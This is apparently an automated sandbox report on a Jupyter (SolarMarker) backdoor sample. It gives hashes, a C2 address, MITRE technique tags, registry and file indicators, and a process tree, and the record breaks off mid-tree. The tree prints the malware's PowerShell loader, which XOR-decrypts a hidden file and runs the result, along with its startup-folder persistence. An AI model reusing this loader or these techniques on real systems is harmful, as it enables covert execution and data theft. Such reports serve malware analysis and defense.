jupyter | 19e1c5f899e604cbdf35f80895496b193c7623a90ebb64cbf7d6eaa9bd5cc5e8

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
22-12-2024 05:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe
Size

2.2MB
MD5

0019cd9ad9aa600af414e441369de01e
SHA1

8f9350264179defcbf4e5903b0dbbc869adf4839
SHA256

9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e
SHA512

757f6b4f125a41492fed5dc5bdf151e3da9a3aef7ce6afd6b88e106c3378fe1bdecc210145230305e2808e094d3c47f33ceca9d1e9de13305a67e8bba54ee077
SSDEEP

49152:fqe3f6qeqKoubuatEiRQhVnKZF3Zsfs+rFa4mzaf0nJg4r/8m:CSiqeqKoutEi8nuwfaEcJ5H

Score

10^/10

jupyter backdoor discovery execution link pdf stealer trojan

Malware Config

Extracted

Family

jupyter

Version

FB-1

http://185.134.30.115

Signatures

Jupyter Backdoor/Client payload 1 IoCs

resource	yara_rule
behavioral2/memory/2392-221-0x0000000006850000-0x000000000685E000-memory.dmp	family_jupyter

Jupyter family
jupyter
Jupyter, SolarMarker
Jupyter is a backdoor and infostealer first seen in mid 2020.
backdoor trojan stealer jupyter

Blocklisted process makes network request 24 IoCs

flow	pid	Process
22	3480	powershell.exe
23	2644	powershell.exe
24	1508	powershell.exe
25	2392	powershell.exe
26	3904	powershell.exe
27	5008	powershell.exe
28	3980	powershell.exe
29	1044	powershell.exe
52	2644	powershell.exe
53	1508	powershell.exe
54	3480	powershell.exe
55	1044	powershell.exe
56	5008	powershell.exe
59	3980	powershell.exe
60	2392	powershell.exe
61	3904	powershell.exe
65	2644	powershell.exe
66	3480	powershell.exe
67	3904	powershell.exe
68	2392	powershell.exe
69	1508	powershell.exe
70	5008	powershell.exe
71	1044	powershell.exe
72	3980	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup\a5b89421c7343d9b2cbcb0c25caa3.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1488	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp

Loads dropped DLL 2 IoCs

pid	Process
1488	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp
1488	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp

Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
5008	powershell.exe
1044	powershell.exe
2392	powershell.exe
3480	powershell.exe
3980	powershell.exe
2516	powershell.exe
2644	powershell.exe
2876	powershell.exe
1508	powershell.exe
3904	powershell.exe

HTTP links in PDF interactive object 1 IoCs

Detects HTTP links in interactive objects within PDF files.

pdf link

resource	yara_rule
behavioral2/files/0x0007000000023cc4-15.dat	pdf_with_link_action

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 20 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp

NTFS ADS 8 IoCs

description	ioc	Process
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe
File created	C:\Users\Admin\dEsKTOp\Microsoft Edge.lnkC:\Users\PuBlic\dEskTOp\Acrobat Reader DC.lnk C:\Users\PuBlic\dEskTOp\Firefox.lnk C:\Users\PuBlic\dEskTOp\Google Chrome.lnk C:\Users\PuBlic\dEskTOp\VLC media player.lnk	powershell.exe

Suspicious behavior: EnumeratesProcesses 60 IoCs

pid	Process
2392	powershell.exe
2392	powershell.exe
1044	powershell.exe
1044	powershell.exe
5008	powershell.exe
5008	powershell.exe
1508	powershell.exe
1508	powershell.exe
3904	powershell.exe
3904	powershell.exe
3980	powershell.exe
3980	powershell.exe
3480	powershell.exe
3480	powershell.exe
2644	powershell.exe
2644	powershell.exe
2876	powershell.exe
2876	powershell.exe
2516	powershell.exe
2516	powershell.exe
1044	powershell.exe
2392	powershell.exe
5008	powershell.exe
1508	powershell.exe
3480	powershell.exe
3980	powershell.exe
3904	powershell.exe
2644	powershell.exe
2876	powershell.exe
2516	powershell.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
2392	powershell.exe
2392	powershell.exe
3904	powershell.exe
5008	powershell.exe
3480	powershell.exe
1044	powershell.exe
1044	powershell.exe
1508	powershell.exe
3980	powershell.exe
2644	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	1044	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	3904	powershell.exe
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	3480	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2516	powershell.exe
Token: SeDebugPrivilege	2876	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4304	AcroRd32.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe
4304	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3148 wrote to memory of 1488	3148	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe	83
PID 3148 wrote to memory of 1488	3148	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe	83
PID 3148 wrote to memory of 1488	3148	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe	83
PID 1488 wrote to memory of 4304	1488	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp	84
PID 1488 wrote to memory of 4304	1488	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp	84
PID 1488 wrote to memory of 4304	1488	9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp	84
PID 4304 wrote to memory of 1232	4304	AcroRd32.exe	86
PID 4304 wrote to memory of 1232	4304	AcroRd32.exe	86
PID 4304 wrote to memory of 1232	4304	AcroRd32.exe	86
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 4996	1232	RdrCEF.exe	87
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88
PID 1232 wrote to memory of 556	1232	RdrCEF.exe	88

C:\Users\Admin\AppData\Local\Temp\9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe
"C:\Users\Admin\AppData\Local\Temp\9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3148
- C:\Users\Admin\AppData\Local\Temp\is-IAAKF.tmp\9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-IAAKF.tmp\9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.tmp" /SL5="$90058,1341938,999424,C:\Users\Admin\AppData\Local\Temp\9a2fafdd0e7cc6266c6075432fc48e8d5c7065a1d455683dfaa4c37a9ed0825e.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1488
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\is-KGASH.tmp\Promotions.pdf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Checks processor information in registry
    - Modifies Internet Explorer settings
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:4304
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1232
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E590EE0F9E230205EF9FF2E3FCA6B6BD --mojo-platform-channel-handle=1740 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4996
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=90616413BC812536E8F6908BEAC03825 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=90616413BC812536E8F6908BEAC03825 --renderer-client-id=2 --mojo-platform-channel-handle=1752 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:556
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=37C9744B63B02203F17F1A723B884EDF --mojo-platform-channel-handle=2280 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4080
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=471C32890D262381C0CE34E0A8D26992 --mojo-platform-channel-handle=1944 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2780
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=F5E0796EAAEAEA8D17E7683A16D4AD9A --mojo-platform-channel-handle=2464 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4800
    - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=4CE704A7DF6F8468748DC4F1999B9281 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=4CE704A7DF6F8468748DC4F1999B9281 --renderer-client-id=7 --mojo-platform-channel-handle=2508 --allow-no-sandbox-job /prefetch:1
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1444
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$p='C:\Users\Admin\ff3150b62b45477910b6632c014ebcb7\6a1857fafbfbbace95cdc849f31d1459\d16fe5da921b2a7f6800f0659c3889e9\f75a29496a5f1e659a9694fcf42345da\be0d079423a68e176b0d032836ecebd8\2f7752bce701e6658ca3581679d6288c\892828900d0d3d2251e754eb73737b70';$xk='WkjBKMnrUVTocEheyQuObXIzfFDCgNGYRspimtSAvPlJwxZdaHLq';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($p));remove-item $p;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - NTFS ADS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5008
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
